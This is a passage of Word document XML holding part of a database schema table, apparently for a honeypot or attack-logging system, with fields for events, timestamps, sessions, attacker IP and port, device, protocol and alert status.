            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UNIQUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip | type | protocol | device-or-session | time bucket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alerted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BOOLEAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TRUE once a notification was sent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGSERIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequential identifier of the event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL, INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UTC time of the event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">session_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">UUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FK → sessions, CASCADE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Parent session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ip, src_port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT, INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker address and source port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">device, protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
